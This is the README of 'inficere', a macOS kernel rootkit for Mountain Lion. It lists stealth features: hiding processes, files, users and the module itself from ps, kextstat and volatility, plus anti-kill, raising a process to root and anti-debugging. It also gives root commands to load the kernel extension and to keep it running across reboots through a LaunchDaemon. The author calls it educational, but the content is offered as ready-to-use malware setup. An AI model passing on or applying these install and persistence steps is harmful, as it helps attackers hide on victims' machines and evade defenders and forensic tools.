inficere
Public version of my Mac OS X rootkit built on top of fractalG's onyx-the-black-cat (https://github.com/gdbinit/onyx-the-black-cat)
Tested only in Mountain Lion, 10.8.2 to 10.8.5. Not guaranteed to work on other versions.
Features
- process hiding - hides from 'ps PID', 'ps aux', Activity Monitor, top, etc
- file/directory hiding
- user hiding - hides a specified user from 'who', 'w'
- self hiding - hides the module itself from kextstat and volatility
- anti-kill
- PID to UID 0
- anti-debug tricks (mostly by @osxreverser) - anti-anti-ptrace, patch task_for_pid(0), etc
Instructions
# chmod -R 755 inficere.kext
# chown -R root:wheel inficere.kext
# mv inficere.kext /System/Library/Extensions/
# kextutil /System/Library/Extensions/inficere.kext
# ./control
For boot persistence:
# plutil -convert binary1 com.enzo.inficere.plist
# mv com.enzo.inficere.plist /Library/LaunchDaemons/com.enzo.inficere.plist
# chown root:wheel /Library/LaunchDaemons/com.enzo.inficere.plist
# launchctl load -w /Library/LaunchDaemons/com.enzo.inficere.plist
Inficere will hide above files after loaded.
I would like to emphasise that I made this for educational purposes only.